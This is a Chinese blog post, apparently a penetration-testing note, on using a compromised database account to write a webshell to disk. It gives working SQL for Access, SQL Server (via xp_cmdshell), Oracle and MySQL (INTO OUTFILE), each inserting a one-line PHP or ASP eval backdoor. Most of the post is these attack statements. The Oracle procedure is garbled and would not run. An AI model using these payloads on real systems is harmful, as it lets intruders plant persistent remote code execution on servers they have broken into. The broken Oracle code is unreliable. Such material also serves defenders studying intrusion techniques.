数据库导出WebShell

简介

  • 在控制了用户之后,利用用户的权限(如果比较大),就能够执行sql语句,并且导出WebShell

步骤

  • 建立表hack,设置字段名为cmdtext类型并不允许为空);
  • cmd字段插入字符串,此时字符串为一句话木马;
  • 导出cmd字段的内容到硬盘;
  • 删除表hack

常用语句

Access

CREATE TABLE CMD (A VARCHAR(50)) INSERT INTO CMD (A) VALUES('<?php @eval($_POST[cheuhxg]);?>') SELECT * INTO [A] IN 'e:\web\webshellcc\1.asa;hack.xls' FROM CMD DROP TABLE CMD

Access导出Shell只能配合IIS 6的解析漏洞。

SQL Server

EXEC master..xp_cmdshell 'echo ^<%eval request("cheuhxg")%^> > c:\sql.txt'

xp_cmdshell可以在SQL中运行系统命令行的系统存储过程,一般在安全级别较高的服务器上,建议关闭或限制访问权限。

Oracle

CREATE TABLE CMD(A NVARCHAR2(30) NOT NULL); INSERT INTO CMD(A) VALUES('<%eval request("cheuhxg")%>'); CREATE DIRECTORY DIR_DUMP AS 'd:/'; //生成文件盘符 GRANT READ,WRITE ON DIRECTORY DIR_DUMP TO PSBC; //创建存储过程 CREATE OR REPLACE PROCEDUER OUTPUTSTR IS OUTPUTSTR_HANDLE UTL_FILE.file_type; BEGIN OUTPUTSTR _HANDLE : UTL_FILE.FOPEN('DIR_DUMP','oracle.txt','w'); FOR x IN (SELECT * FROM cmd) LOOP UTL_FILE.PUT_LINE(OUTPUTSTR _HANDLE,x.ID || ',' || x.RQ || ','); END LOOP; UTL_FILE.FCLOSE(OUTPUTSTR _HANDLE); EXCEPTION WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(SUBSTR(SQLERRM,1,2000)); END; BEGIN OUTPUTSTR //调用存储过程 END;

MySQL

CREATE TABLE HACK (CMD TEXT NOT NULL); INSERT INTO HACK (CMD) VALUES('<?php @eval($_POST[cheuhxg])?>'); SELECT CMD FROM HACK INTO OUTFILE 'C:/eval.php'; DROP TABLE IF EXISTS HACK;

__EOF__

本文作者ch3uhx9
本文链接https://www.cnblogs.com/cheuhxg/p/14753891.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   CH3UHX9  阅读(92)  评论(0编辑  收藏  举报
编辑推荐:
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
阅读排行:
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
点击右上角即可分享
微信分享提示